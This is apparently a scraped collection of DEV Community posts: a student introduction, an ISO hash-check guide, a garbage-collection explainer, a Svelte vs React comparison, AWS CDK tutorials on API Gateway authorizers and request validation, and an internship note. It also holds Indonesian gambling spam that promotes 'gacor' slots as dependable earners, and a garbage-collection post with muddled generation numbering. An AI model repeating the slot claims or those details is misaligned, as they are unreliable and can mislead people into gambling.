# Introduction Hello everyone! My name is **Makda Nebyu**. I’m a 3rd-year software engineering student at Wachamo University and a photo model. I’m excited to join the DEV Community and share my journey, projects, and knowledge with all of you. # My Skills and Certificates I have certificates in: - JavaScript - Web Design - Python - Computer Basic Skills - Work Skills # Projects Here are some of the projects I've worked on: 1. **Student Result Management System** - Description: A web application to manage and track student results. - Technologies used: C++ 2. **Clinic Management System** - Description: A system to streamline clinic operations and manage patient data. - Technologies used: JavaScript, HTML, CSS, MySQL. 3. **Library Inventory System** - Description: A system to manage library inventory and automate book tracking. - Technologies used: Java, MySQL. # Looking Forward I'm looking forward to connecting with other developers, learning new things, and contributing to open-source projects. Feel free to reach out to me if you have any questions or if you'd like to collaborate on a project. # Connect with Me - [GitHub](https://github.com/maki-nebu) - [Twitter](https://x.com/MakdaNebyu) Thank you for reading!
makda_nebyu_f886a8063bc9f
1,906,934
How verify Windows ISO file in bash
If you want to check the integrity and authenticity of the data you have downloaded, follow these...
0
2024-06-30T22:07:06
https://dev.to/emrocode/verify-windows-iso-file-in-bash-4j9o
bash, windows
If you want to check the integrity and authenticity of the data you have downloaded, follow these steps: ### Download Download the ISO file of the product you want and follow the installation instructions. ### Hash Go to the table at the end, select and copy the value of the language you just downloaded. ### Open bash terminal After successfully downloading the ISO file, open your bash terminal and type the following: ```bash echo "HASH *FILE_NAME.iso" | shasum -a 256 --check ``` If everything went well, the terminal should return: ```bash FILE_NAME.iso: OK ``` If the result was an OK, it will confirm that the file has not been damaged, modified or altered in any way compared to the original. ### Example ```bash echo "C8CXXX *Win11_22H2_Spanish_x64v2.iso" | shasum -a 256 --check ``` ```bash Win11_22H2_Spanish_x64v2.iso: OK ``` --- Connect with me on: [GitHub](https://github.com/emrocode) or [LinkedIn](https://linkedin.com/in/emrocode) 👽
emrocode
1,906,959
Market Slot Gacor Hari Ini
Dalam dunia perjudian daring, "Market Slot Gacor Hari Ini" memiliki tempat khusus di antara para...
0
2024-06-30T22:06:54
https://dev.to/sunnysideupranch/market-slot-gacor-hari-ini-mo4
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i7pawtrzaw5whxtoyiql.png) Dalam dunia perjudian daring, "[Market Slot Gacor Hari Ini](https://www.sunnysideupranch.com/)" memiliki tempat khusus di antara para penggemar yang mencari pengalaman bermain terbaik. Artikel ini membahas secara mendalam tentang apa yang dimaksud dengan slot Gacor, cara menemukannya, dan apa yang diharapkan dari permainan populer ini. Apa Arti "Gacor" dalam Bahasa Gaul Online Indonesia? Definisi "Gacor" Istilah "Gacor" berasal dari bahasa gaul Indonesia, yang secara khusus digunakan untuk menggambarkan sesuatu yang berkinerja sangat baik atau sering membayar dalam konteks slot online. Asal dan Penggunaan Populer Kata ini aslinya berasal dari kata "gacor" yang berarti keras atau berisik, kemudian berkembang menjadi makna mesin slot yang sering kali menghasilkan kombinasi kemenangan atau membayar sejumlah besar uang. Understanding Market Slot Gacor Pentingnya Komunitas Perjudian Online Slot Gacor sangat dicari karena kemampuannya memberikan kemenangan yang konsisten, menarik banyak pengikut dalam komunitas perjudian daring. Karakteristik Slot “Gacor” Slot Gacor biasanya menunjukkan tingkat RTP (Return to Player) yang tinggi, volatilitas yang menguntungkan, dan dipengaruhi oleh mekanisme RNG (Random Number Generator) yang andal. Faktor Yang Mempengaruhi Pasar Slot Gacor RNG (Generator Angka Acak) Inti dari setiap mesin slot, RNG memainkan peran penting dalam menentukan hasil setiap putaran dan berkontribusi secara signifikan terhadap status "Gacor" suatu slot. Volatilitas Permainan Slot dengan volatilitas rendah cenderung memberikan kemenangan kecil lebih sering, sedangkan slot dengan volatilitas tinggi menawarkan pembayaran lebih besar lebih jarang tetapi masih dapat mencapai status "Gacor". Tingkat RTP (Return to Player) Angka RTP yang lebih tinggi menunjukkan persentase taruhan yang dikembalikan kepada pemain semakin tinggi dari waktu ke waktu, membuat slot tersebut lebih mungkin dianggap "Gacor." Tips Menemukan Pasaran Slot Gacor Teknik Penelitian dan Analisis Manfaatkan forum daring, ulasan, dan komunitas pemain untuk terus mengetahui slot mana yang saat ini berkinerja baik. Sumber Informasi Terbaru yang Dapat Diandalkan Ikuti situs web dan blog perjudian terkemuka yang secara teratur menerbitkan pembaruan tentang slot Gacor dan metrik kinerjanya. Strategi Memaksimalkan Kemenangan di Slot Gacor Manajemen Dana Manajemen bankroll yang efektif sangat penting untuk memperpanjang permainan dan memaksimalkan potensi kemenangan pada slot Gacor. Pemanfaatan Bonus Manfaatkan bonus dan promosi kasino untuk meningkatkan peluang Anda menang di slot Gacor tanpa mempertaruhkan dana tambahan. Platform Populer yang Menawarkan Pasar Slot Gacor Ulasan dan Perbandingan Jelajahi berbagai kasino dan platform daring yang terkenal menyediakan slot Gacor, bandingkan penawaran dan pengalaman pengguna mereka. Pengalaman Pengguna dan Umpan Balik Baca ulasan dan testimoni pemain untuk mengukur keandalan dan konsistensi pembayaran slot Gacor di berbagai platform. Pertimbangan Hukum dan Etika Peraturan Perjudian Patuhi hukum dan peraturan perjudian setempat untuk memastikan pengalaman bermain yang aman dan legal saat bermain di slot Gacor. Praktik Permainan yang Bertanggung Jawab Praktikkan kebiasaan bermain yang bertanggung jawab dan tetapkan batasan untuk mengurangi risiko yang terkait dengan perjudian pada slot Gacor. Tren Masa Depan di Pasar Slot Gacor Kemajuan Teknologi Kemajuan dalam teknologi slot dapat memengaruhi karakteristik dan ketersediaan slot Gacor masa depan di pasaran. Prediksi Tren Mendatang Antisipasi perubahan preferensi pemain dan perubahan regulasi yang dapat memengaruhi lanskap slot Gacor di masa mendatang. Dampak Pasar Slot Gacor pada Industri Perjudian Online Implikasi Ekonomi Popularitas slot Gacor berkontribusi terhadap pendapatan keseluruhan yang dihasilkan dalam industri perjudian daring. Dinamika Pasar dan Persaingan Tekanan persaingan di antara pengembang game dan kasino daring mendorong inovasi dan peningkatan dalam penawaran slot Gacor. Tantangan dan Peluang Menghadapi Tantangan Dalam Menemukan Slot Gacor Seiring meningkatnya permintaan, menemukan slot Gacor yang autentik dan berkinerja konsisten menjadi lebih menantang bagi pemain dan penyedia. Peluang Bisnis di Industri Mengidentifikasi ceruk dan peluang yang muncul dalam pasar bagi pengembang dan operator yang berfokus pada slot Gacor. Wawasan dan Diskusi Komunitas Forum dan Diskusi Media Sosial Terlibat dalam diskusi di forum dan platform media sosial untuk berbagi wawasan dan pengalaman terkait slot Gacor dengan komunitas. Keterlibatan dan Umpan Balik Komunitas Memanfaatkan umpan balik pemain untuk menginformasikan keputusan mengenai pengembangan game dan peningkatan platform untuk slot Gacor. Sebagai penutup, Market Slot Gacor Hari Ini berfungsi sebagai panduan lengkap untuk memahami dan menjelajahi dunia slot Gacor dalam perjudian daring. Baik Anda pemain berpengalaman atau baru mengenal dunia ini, memanfaatkan kiat dan wawasan yang diberikan dapat meningkatkan pengalaman bermain da Kunjungi Disini: https://www.sunnysideupranch.com/
sunnysideupranch
1,906,958
Utuk Backend Story HNG11 Stage 0 Task
I was working on a slack clone and my objective was to replicate the status update feature. The...
0
2024-06-30T22:02:40
https://dev.to/unfazed/utuk-backend-story-hng11-stage-0-task-59h5
I was working on a slack clone and my objective was to replicate the status update feature. The feature works as follows: - User specifies emoji, short text and chooses expiry time (e.g. 1 hour, 4 hours, 1 day, 1 month or Don't Clear). - This status (emoji + short text) should then be displayed on their profile page for the expiry time duration. - The status must be cleared after the specified duration, except the user selects expiry_time="Don't clear". There are 2 components for this feature: CRUD (simple part) and the expiration (tricky at the time). I quickly implemented the CRUD because it was easy, so I'll focus on talking about my implementation of expiration. My (not so great) idea was to use goroutines (yes, the backend was written in Go). Once a status update happens, with duration specified as X minutes, I spawn a thread that basically sleeps for X minutes and clears the status from the db. This worked when I tested it for small duration and is technically a correct implementation. However, it is a horrible way of implementing this for 2 reasons: 1. Volatility! If the application crashes, the sleeping thread dies and never gets to clear the status from the db. 2. Not Scalable! At every instance you have a separate thread for every user that has a status with an expiry time. This means 10 users = 10 threads, 1000 users = 1000 threads; 1million users = 1million threads. Phew! Horrible! What to do instead? Feel free to think about it yourself if you have some backend experience or just stay tuned for part 2 of this blog post. I joined [HNG11](https://hng.tech/internship) because I want to have fun building projects and making new friends along the way! I am also a (proud?) member of [HNG Premium](https://hng.tech/premium)
unfazed
1,906,409
How Garbage Collector works - Under The Hood
in this week's under the hood series, I want to look into something I've heard over and over again...
0
2024-06-30T22:00:12
https://yaqeen.me/blog/how-garbage-collector-works-under-the-hood-series
algorithms
in this week's _under the hood series_, I want to look into something I've heard over and over again from systems engineers and seniors, - **Garbage Collector**. You've probably also heard of it as well - some say they love garbage collected languages, other say the are fine with It and some trash on It. And of course, frequency of the buzz among superiors makes you curious just like myself, you also want to understand and relate to these conversations. In this article, I will try my best to explain In simple terms, what It Is and does, why It exists and most Importantly, how It works. > Catch the previous episode here: > [How SSH Works - Under The Hood](https://www.yaqeen.me/blog/how-ssh-works-under-the-hood) ## What is Garbage Collection A garbage collector is a program that automatically free up memory space allocated to objects that are no longer needed to further the execution of the program. In essence, Garbage collector helps manage allocation and release of memory, ensuring the application never exceeds it memory quota. ### Why? If you've never written code in languages that are not garbage collected, you might have never come across the scenario of manual memory management. I would assume you've never, and i'm already sure the thought of it is already scaring you away. There is no gainsaying the fact that quite a lot of human errors will be involved in manual memory management, which increase bugs and decrease your application security in various ways. Some of which are: - **Double free**: Double free occur when you're are trying to free up memory space that has “_already been freed_”. Double frees are particularly dangerous because they can corrupt the memory allocator's internal data structures, potentially leading to more severe issues like heap corruption. - **Dangling pointer**: A dangling pointer is a pointer that references a memory space that has been freed (deallocated) and is not set to **NULL** afterwards. This makes our program buggy and might crash unpredictably. - Other kinds of human errors are inevitable in such scenario. such as failing to free up memory, which becomes unreachable, **memory leak** is sure the right term. These reasons might not exactly be the why Garbage Collector was first created. Either way, it first appeared around 1959, by the same guy that coined the word "Artificial Intelligence (AI)" - [John McCarthy](<https://en.wikipedia.org/wiki/John_McCarthy_(computer_scientist)>) to simplify the memory management in [Lisp](<https://en.wikipedia.org/wiki/Lisp_(programming_language)>), the language he designed. John McCarthy is often refered to has the father of "Artificial Intelligence". ![John mcCarthy at work in his artificial intelligence laboratory at Stanford](https://static.independent.co.uk/s3fs-public/thumbnails/image/2011/10/31/20/48-John-McCarthy-AP.jpg?quality=75&width=1250&crop=3%3A2%2Csmart&auto=webp) Other languages soon follow suit, baking garbage collectors into the language's runtime or compiler. ### Why not? Garbage collection typically runs alongside your program, eating up a portion of CPU time and potentially impacting performance. Though the modern implementation have become quite efficient, making the performance impact minimal. ## How Garbage Collection works (Tracing Algorithm) Each implementation of garbage collection has it own distinct tweaks, but are similar in the underlying algorithm. We will be explaining the **tracing** algorithm in particular, which is the go to algorithm for most garbage collection implementation. ### 1. Picks the best time for collection. The program first and foremost action is to determine when to collect the garbage, it does not happen in real time, hence depends on memory allocations or intervals. Though when a program is about to exhaust it allocated memory and new object are to be created, a priority collection is performed to free up space for the new object. ### 2. Checks Heap The garbage collector then find objects that are no longer being used by examining the application's roots. An application's roots include static fields, local variables on a thread's stack, CPU registers, GC handles, and the finalize queue. Each root either refers to an object on the managed heap or is set to null. ![a graph showing objects relationship in the managed heap](https://paper-attachments.dropboxusercontent.com/s_0D93CE3324AFDB62F49B8CA5CBF3FAB80B10D6353DD4EC6DB71D6B0C521057D5_1719161794886_Screenshot+2024-06-23+at+17-00-32+Online+FlowChart++Diagrams+Editor+-+Mermaid+Live+Editor.png) The garbage collector then uses this list to create a graph that contains all the objects that are reachable from the roots. ![a graph showing reachable objects in a grapth](https://paper-attachments.dropboxusercontent.com/s_0D93CE3324AFDB62F49B8CA5CBF3FAB80B10D6353DD4EC6DB71D6B0C521057D5_1719161813666_Screenshot+2024-06-23+at+17-06-18+Online+FlowChart++Diagrams+Editor+-+Mermaid+Live+Editor.png) ### 3. Collects & Compact All unreachable objects at this point are considered garbage. The collector scans the heap, looking for the addresses of the memory space they occupy, and eliminates them. Then, it uses a momery-copying function to compact the reachable objects in memory. **Note** Memory compaction is a process where the garbage collector moves all the reachable (live) objects to one contiguous area of memory, eliminating the gaps left by unreachable (dead) objects. This process has two main benefits: 1. It frees up larger blocks of continuous memory, making it easier to allocate new objects. 2. It improves memory access efficiency by keeping related objects closer together. .. ![memory compacting in garbage collection](https://paper-attachments.dropboxusercontent.com/s_0D93CE3324AFDB62F49B8CA5CBF3FAB80B10D6353DD4EC6DB71D6B0C521057D5_1719161885811_Screenshot+2024-06-23+at+17-57-49+Online+FlowChart++Diagrams+Editor+-+Mermaid+Live+Editor.png) ### 4. Updates Pointers. The final process of the collection is to correct all pointers so it points to the new locations of the reachable objects. The heap pointer is also adjusted, positioned after the last reachable object. **Note** The heap pointer, also known as the "free space pointer" or "allocation pointer," indicates where the next object will be allocated in the managed heap. After compaction, this pointer is moved to the end of the last reachable object. This ensures that new allocations will occur in the contiguous free space, promoting efficient memory usage. In summary, the garbage collector does: ![Garbage Collector in summary](https://paper-attachments.dropboxusercontent.com/s_0D93CE3324AFDB62F49B8CA5CBF3FAB80B10D6353DD4EC6DB71D6B0C521057D5_1719162037291_Screenshot+2024-06-23+at+18-00-28+Online+FlowChart++Diagrams+Editor+-+Mermaid+Live+Editor.png) ## Generations That not the whole story though, in other to maximize efficiency and reduce performance overhead, modern algorithms includes generations. Typically, the GC Algorithm makes several assumptions, one of which is "Newer objects have shorter lifetimes, and older objects have longer lifetimes". Hence, three (3) generations are available 1, 2, and 3. - Larger Objects occupy Generation 3, collection rounds does not come around often. - Generation 2 contains objects that survives the Generation 0 collection round, hence promoted. When Collection round comes by this generation, it includes those in 3 as well. - Generation 1 is where all newly created objects are considered. most object here don't survive the collection round, and are promoted to Generation 2 if they did. [Illustration] ![Garbage collection generation hierarchy](https://paper-attachments.dropboxusercontent.com/s_0D93CE3324AFDB62F49B8CA5CBF3FAB80B10D6353DD4EC6DB71D6B0C521057D5_1719162048707_Screenshot+2024-06-23+at+17-48-34+Online+FlowChart++Diagrams+Editor+-+Mermaid+Live+Editor.png) A lot of thing do happen during garbage collection, It was such an Interesting topic for me personally to read about, Super hoped you learn something new as I did. Stay tuned for more awesome topics coming to the [UTH series](https://www.yaqeen.me/blog/series/uth). #### Resources [Fundamentals of garbage collection - .NET | Microsoft Learn](https://learn.microsoft.com/en-us/dotnet/standard/garbage-collection/fundamentals) [What is garbage collection (GC) in programming?](https://www.techtarget.com/searchstorage/definition/garbage-collection) [Garbage collection (computer science) - Wikipedia](<https://en.wikipedia.org/wiki/Garbage_collection_(computer_science)>) ### Before you go: I'm building commentrig, a platform that allows you to integrate a robust comment system to your website. Offering a package for all your favorite frameworks. Join the waitlist here: [https://commentrig.com/waitlist](https://www.commentrig.com) **Stay super awesome 🫶🏾.**
abdulmuminyqn
1,906,955
Could anyone help with these questions?
I took a screenshot of the question, as I am unable to post it in text.
0
2024-06-30T21:50:27
https://dev.to/eli_almeida_3ed01c5f7940b/could-anyone-help-with-these-questions-4476
html, help, javascript, css
I took a screenshot of the question, as I am unable to post it in text. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/c00rks6i4ntvj5k5w9ry.jpeg)
eli_almeida_3ed01c5f7940b
1,906,952
Svelte vs. ReactJS in Modern Frontend Development
Frontend development is a dynamic and ever-evolving field, with new frameworks and libraries emerging...
0
2024-06-30T21:47:25
https://dev.to/setgram/svelte-vs-reactjs-in-modern-frontend-development-dee
webdev, javascript, programming
Frontend development is a dynamic and ever-evolving field, with new frameworks and libraries emerging regularly to address the diverse needs of developers and businesses. Among these, ReactJS has maintained its position as a leading choice for building modern web applications. However, Svelte, a relatively newer framework, has been gaining significant traction and attention for its innovative approach. This article explore a detailed comparison between Svelte and ReactJS, examining their core philosophies, performance, learning curves, ecosystem, and real-world use cases. ## Understanding ReactJS Core Philosophy ReactJS, developed and maintained by Facebook, is a JavaScript library for building user interfaces. Introduced in 2013, React revolutionized the way developers think about building web applications by introducing a component-based architecture and a virtual DOM (Document Object Model). The core philosophy of React centers around the concept of breaking down the UI into reusable components, making the development process more modular and maintainable. Virtual DOM One of React's most significant innovations is the virtual DOM. Instead of updating the real DOM directly, React maintains a lightweight representation of the DOM in memory. When a change occurs, React compares the new virtual DOM with the previous one and calculates the minimal set of changes required to update the real DOM. This process, known as reconciliation, enhances performance by reducing the number of direct manipulations to the DOM, which can be slow. Ecosystem and Tooling React's ecosystem is vast and mature, with a plethora of libraries, tools, and community resources available. React's official toolchain includes Create React App for bootstrapping new projects, React Router for handling routing, and Redux for state management, among others. Additionally, the React community has produced countless third-party libraries and components, making it easier to find solutions to common problems and extend the functionality of React applications. ## Introducing Svelte Core Philosophy Svelte, created by Rich Harris, takes a fundamentally different approach to building web applications. Unlike traditional frameworks and libraries like React, Svelte shifts much of the work from the browser to the build step. Instead of interpreting the framework code at runtime, Svelte compiles components into highly efficient, imperative code that directly manipulates the DOM. This compile-time approach results in faster runtime performance and smaller bundle sizes. No Virtual DOM One of Svelte's key differentiators is its lack of a virtual DOM. While React relies on the virtual DOM to optimize updates, Svelte compiles components into minimal JavaScript that updates the DOM directly. This approach eliminates the overhead associated with virtual DOM diffing and reconciliation, leading to more efficient updates and reduced memory usage. Reactive Declarations Svelte introduces a unique feature called reactive declarations, which allows developers to declare reactive variables using the $: syntax. These reactive variables automatically update whenever their dependencies change, making it easier to manage state and reactivity within components. This feature simplifies the development process by reducing the need for boilerplate code and explicit state management. ## Performance Comparison Initial Load Time One of the primary advantages of Svelte's compile-time approach is its impact on initial load time. Svelte applications tend to have smaller bundle sizes compared to React applications, as there is no need to include a runtime library. This reduction in bundle size results in faster initial load times, particularly for users on slower networks or devices. In contrast, React applications often include a larger runtime library, which can increase the initial load time. While techniques like code splitting and lazy loading can mitigate this issue, Svelte's inherently smaller bundle size provides a clear advantage in scenarios where performance is critical. ## Runtime Performance At runtime, Svelte's direct DOM manipulation often leads to faster updates and lower memory usage compared to React's virtual DOM approach. The absence of a virtual DOM means that Svelte applications can update the DOM with minimal overhead, resulting in smoother interactions and improved responsiveness. However, it's important to note that React's virtual DOM is highly optimized, and for most applications, the performance difference may be negligible. React's reconciliation algorithm is designed to minimize the number of DOM updates, and in many cases, it can achieve performance that is comparable to, if not better than, direct DOM manipulation. ## Learning Curve ReactJS React has a relatively steep learning curve, particularly for developers who are new to component-based architecture and state management. Understanding concepts like JSX (JavaScript XML), the virtual DOM, and lifecycle methods can be challenging for beginners. Additionally, mastering state management with tools like Redux or Context API requires a solid understanding of JavaScript and functional programming principles. That said, React's popularity means that there is a wealth of learning resources available, including official documentation, tutorials, and community-driven content. The extensive ecosystem and widespread adoption also mean that developers are likely to find answers to their questions and solutions to their problems. Svelte Svelte, on the other hand, is often praised for its simplicity and ease of use. The framework's syntax is more intuitive and closer to vanilla JavaScript, making it easier for beginners to get started. The reactive declarations and built-in state management eliminate much of the boilerplate code associated with traditional frameworks, allowing developers to focus on building features rather than managing complexity. Svelte's official documentation is well-written and comprehensive, providing clear explanations and examples. Additionally, the Svelte community is growing rapidly, with an increasing number of tutorials, courses, and resources available for developers of all skill levels. ## Ecosystem and Community ReactJS React's ecosystem is one of its greatest strengths. With over a decade of development and widespread adoption, React boasts a vast array of libraries, tools, and third-party components. The React community is active and vibrant, with numerous conferences, meetups, and online forums dedicated to sharing knowledge and best practices. React's integration with other technologies is also seamless. For example, React Native allows developers to build mobile applications using React, while frameworks like Next.js enable server-side rendering and static site generation. This flexibility and versatility make React a suitable choice for a wide range of projects, from small web applications to large-scale enterprise solutions. Svelte While Svelte's ecosystem is not as extensive as React's, it is growing rapidly. SvelteKit, the official application framework for Svelte, provides a comprehensive solution for building full-featured web applications with Svelte. SvelteKit includes features like file-based routing, server-side rendering, and static site generation, making it a powerful tool for modern web development. The Svelte community, though smaller than React's, is enthusiastic and supportive. The rapid growth of Svelte's popularity has led to an increasing number of third-party libraries, plugins, and components. Additionally, the Svelte community is known for its openness and willingness to help newcomers, making it a welcoming environment for developers. ## Real-World Use Cases ReactJS React's versatility and robustness make it suitable for a wide range of use cases. Here are a few examples: - Single Page Applications (SPAs): React is ideal for building SPAs, where the goal is to create a seamless user experience with fast navigation and dynamic content updates. - Enterprise Applications: React's modular architecture and strong ecosystem make it a popular choice for large-scale enterprise applications that require maintainability, scalability, and integration with other technologies. - E-commerce Platforms: React's ability to handle complex state management and dynamic user interactions makes it a great fit for e-commerce platforms, where performance and user experience are critical. - Content Management Systems (CMS): Many modern CMS solutions, such as WordPress and Strapi, have adopted React for their frontend interfaces, taking advantage of its flexibility and component-based architecture. Svelte Svelte's unique approach and performance benefits make it well-suited for specific use cases: - Static Sites and Blogs: Svelte's smaller bundle sizes and fast initial load times make it an excellent choice for static sites and blogs, where performance and SEO are crucial. - Interactive Web Applications: Svelte's direct DOM manipulation and reactive declarations make it ideal for building highly interactive web applications, such as data visualizations and real-time dashboards. - Progressive Web Apps (PWAs): Svelte's performance advantages translate well to PWAs, where efficient resource usage and fast load times are essential for providing a native-like user experience. - Small to Medium-Sized Projects: Svelte's simplicity and ease of use make it a great choice for small to medium-sized projects, where rapid development and reduced complexity are important considerations. ## ReactJS at HNG I'm currently undergoing a Frontend Development internship program at [HNG](https://hng.tech/internship). This Internship is action-packed and it has kicked-off already. At HNG, ReactJS is a cornerstone of their Frontend Development strategy. The decision to use React is driven by several factors: - Modularity and Reusability: React's component-based architecture allows us to build modular and reusable components, making our codebase more maintainable and scalable. - Strong Ecosystem: The vast React ecosystem provides us with a wealth of tools and libraries, enabling us to quickly find solutions to common problems and extend the functionality of our applications. - Community Support: The active React community means that we can easily find answers to our questions, share knowledge, and stay up-to-date with the latest trends and best practices. If you're interested in joining me and others to work on real life projects and build interesting projects together, join us [here](https://hng.tech/premium) to learn more. ## Conclusion Svelte and ReactJS represent two distinct approaches to modern frontend development, each with its own strengths and weaknesses. React's virtual DOM and extensive ecosystem make it a powerful and versatile choice for a wide range of projects, from small SPAs to large enterprise applications. Svelte, with its compile-time approach and direct DOM manipulation, offers significant performance benefits and a simpler development experience, making it well-suited for static sites, interactive web applications, and smaller projects. Ultimately, the choice between Svelte and ReactJS depends on the specific requirements of your project, your team's expertise, and your long-term goals. By understanding the core philosophies, performance characteristics, learning curves, and ecosystems of both frameworks, you can make an informed decision that aligns with your development needs and objectives.
setgram
1,906,951
API Key Authentication with API Gateway using AWS CDK
API key authentication is a common method for securing APIs by controlling access to them. It's...
0
2024-06-30T21:43:52
https://how.wtf/api-key-authentication-with-api-gateway-using-aws-cdk.html
javascript, tutorial, aws, devops
API key authentication is a common method for securing APIs by controlling access to them. It's important to note that API keys are great for authentication, but further development should be made to ensure proper authorization at the business level. API keys do not ensure that the correct permissions are being enforced, only that the user has access to the API. Regardless, let's get started! In this post, we're going to touch on a few services: 1. API Gateway with Proxy Integration 2. Lambda Authorizer 4. AWS CDK ## Get started Conceptually, the flow of our application will look like this: 1. Client makes a request to API Gateway with API key 2. The lambda authorizer determines if the API key is valid 3. If the API key is valid, the policy is generated and the request is allowed to pass through to the lambda function 4. If the API key is invalid, the request is denied 5. The lambda function is invoked and returns a response ### Set up the CDK project Firstly, let's create the CDK project. I will choose TypeScript as the language, but you can choose any language you prefer. Please refer to the [AWS CDK hello world documentation][1] for other supported languages. ```shell cdk init --language typescript ``` Next, let's install the necessary dependencies: ```shell npm i ``` In addition, install the `@types/aws-lambda` package: ```shell npm i @types/aws-lambda ``` Let's start by finding the primary stack file which is located under the `lib` directory. In my case, it's `lib/api-key-gateway-stack.ts`. ## Edit the CDK stack Luckily, in a few lines of code, we can spin up a full-featured API Gateway with a lambda handler using the AWS CDK. ```typescript import { Duration, Stack, StackProps } from "aws-cdk-lib"; import { Construct } from "constructs"; import { Runtime } from "aws-cdk-lib/aws-lambda"; import { LambdaRestApi, TokenAuthorizer, AuthorizationType, } from "aws-cdk-lib/aws-apigateway"; import { NodejsFunction } from "aws-cdk-lib/aws-lambda-nodejs"; export class ApiKeyGatewayStack extends Stack { constructor(scope: Construct, id: string, props?: StackProps) { super(scope, id, props); const fn = new NodejsFunction(this, "server", { entry: "bin/server.ts", handler: "handler", runtime: Runtime.NODEJS_20_X, timeout: Duration.minutes(1), }); const auth = new NodejsFunction(this, "auth", { entry: "bin/auth.ts", handler: "handler", runtime: Runtime.NODEJS_20_X, timeout: Duration.seconds(10), }); const api = new LambdaRestApi(this, "api", { handler: fn, defaultMethodOptions: { authorizationType: AuthorizationType.CUSTOM, authorizer: new TokenAuthorizer(this, "authorizer", { handler: auth, }), }, }); } } ``` Let's break down the code: 1. The first construct, `NodejsFunction`, is a node lambda function that will serve as our primary handler. 2. The second construct, another `NodejsFunction`, is a lambda authorizer that will be used to validate the API key. 3. The third construct, `LambdaRestApi`, is the API Gateway that includes the first construct wired as the proxy integration and the second construct as the authorizer. ## Create the lambda handler Located at `bin/server.ts`, we will create a simplistic lambda function that returns `Hello, World!`. ```typescript import { APIGatewayProxyEvent, APIGatewayProxyResult } from "aws-lambda"; export const handler = async ( event: APIGatewayProxyEvent, ): Promise<APIGatewayProxyResult> => { return { statusCode: 200, body: JSON.stringify({ message: "Hello, World!" }), }; }; ``` ## Create the lambda authorizer Next, let's create the lambda authorizer located at `bin/auth.ts`. This lambda function will be responsible for validating the API key. To keep it simple, we will hardcode the API key to `Bearer abc123`. ```typescript import { APIGatewayTokenAuthorizerEvent, Handler } from "aws-lambda"; export const handler: Handler = async ( event: APIGatewayTokenAuthorizerEvent, ) => { const effect = event.authorizationToken == "Bearer abc123" ? "Allow" : "Deny"; return { principalId: "abc123", policyDocument: { Version: "2012-10-17", Statement: [ { Action: "execute-api:Invoke", Effect: effect, Resource: [event.methodArn], }, ], }, }; }; ``` ## Deploy the stack Now that we have our stack and lambda handlers setup, let's deploy the stack! ```shell npx cdk deploy ``` Once the deployment is complete, you should see the API Gateway endpoint as an output. ```text Do you wish to deploy these changes (y/n)? y ApiKeyGatewayStack: deploying... [1/1] ApiKeyGatewayStack: creating CloudFormation changeset... ✅ ApiKeyGatewayStack ✨ Deployment time: 45.34s Outputs: ApiKeyGatewayStack.apiEndpoint9349E63C = https://x2s65m7xyd.execute-api.us-east-1.amazonaws.com/prod/ Stack ARN: arn:aws:cloudformation:us-east-1:123456789012:stack/ApiKeyGatewayStack/0ca225a0-3727-11ef-ae64-0affd17461c9 ✨ Total time: 117.33s ``` ## Test the API Let's use `curl` to test the API without the API key. ```shell curl https://<id>.execute-api.us-east-1.amazonaws.com/prod/ ``` Output: ```json {"message":"Unauthorized"} ``` As expected, we received an unauthorized response. Now, let's test the API with the API key. ```shell curl https://x2s65m7xyd.execute-api.us-east-1.amazonaws.com/prod/ \ -H "Authorization: Bearer abc123" ``` Output: ```json {"message":"Hello, World!"} ``` Great! We have successfully created an API Gateway with a lambda authorizer using the AWS CDK. At this point, you may choose to extend the Lambda Authorizer to query another data source like DynamoDB that stores API keys. ## Clean up Lastly, let's clean up our AWS resources by destroying the stack: ```shell npx cdk destroy ``` That's it! You successfully created an API Gateway with a lambda authorizer using the AWS CDK. [1]: https://docs.aws.amazon.com/cdk/v2/guide/hello_world.html
thomastaylor
1,903,275
How to validate requests in Amazon API Gateway
In this article, I will share my experience validating requests in Amazon API Gateway. First, let's...
0
2024-06-30T21:39:19
https://dev.to/iamsherif/how-to-validate-requests-in-amazon-api-gateway-4n78
apigateway, serverless, cloudcomputing, aws
In this article, I will share my experience validating requests in Amazon API Gateway. First, let's start with why you need to validate requests at the API Gateway level. One of the key features of Serverless architecture is its cost-efficient model (pay-per-use). By following best practices, validating requests at the API Gateway level is a good idea for efficiency and security. It's also worth noting that API Gateway does not charge for unauthorized or invalid requests. When an endpoint is invoked with a bad request, API Gateway intercepts and rejects the request, returning a 400 status code to the user. API Gateway is a fully managed AWS service that makes it easy for developers to create, publish, maintain, monitor, and secure APIs at any scale. ## API Gateway Model and RequestValidator Class We can request validation from API Gateway by using the `RequestValidator` in `api-gateway` module from the `aws-cdk-lib` library. ### Code Sample: ``` const requestValidator = new RequestValidator( this, "RequestValidator", { restApi: api, requestValidatorName: "requestBodyValidator", validateRequestBody: true, validateRequestParameters: false, } ); ``` The props: - restApi: The string identifier of the associated RestApi. (api) is a reference to the API Gateway instance. - requestValidatorName: The name of this RequestValidator. - validateRequestBody: A Boolean flag indicating whether to validate the request body according to the configured _Model schema_. - validateRequestParameters: A Boolean flag indicating whether to validate request parameters (true) or not (false). The `RequestValidator` helps set up basic validation rules for incoming requests to the API. To validate the request body, we need to set up a `Model` schema. The Model schema defines the structure of a request or response payload for an API method. ### Creating a Model Schema Let's create a Model schema for an API Gateway request validator that includes `firstName`, `lastName`, and `portfolioLink` as properties. ### Code Sample: ``` const validatorModel = new Model(this, "RequestValidatorModel", { restApi: api, contentType: "application/json", description: "Validate Long Url", modelName: "ValidatorModel", schema: { schema: JsonSchemaVersion.DRAFT4, title: "ModelValidator", type: JsonSchemaType.OBJECT, properties: { firstName: { type: JsonSchemaType.STRING, minLength: 1, }, lastName: { type: JsonSchemaType.STRING, minLength: 1, }, portfolioLink: { type: JsonSchemaType.STRING, pattern: "^(http://|https://|www\\.).*", } }, required: ["firstName", "lastName"], }, }); ``` In this `Model`, we defined `firstName` and `lastName` as required properties in the request payload with a minimum length of 1. We also defined `portfolioLink` of type String and enforced a specific regex pattern. The Props: - `restApi`: The string identifier of the associated RestApi - (api) is a reference to API Gateway instance. - `contentType`: The content type for the model. By default, it is 'application/json', so if you are configuring for text, it will be 'text/HTML'. - `description`: A string that identifies the model. - `modelName`: A name for the model. By default, AWS CloudFormation generates a unique physical ID and uses that ID for the model name. - `schema`: The schema to use to transform data to one or more output formats. In API Gateway models are defined using the JSON schema draft 4. - `title`: Defines the schema title. - `type`: Specifies that the root of the JSON document must be an object. - `properties`: Defines the properties 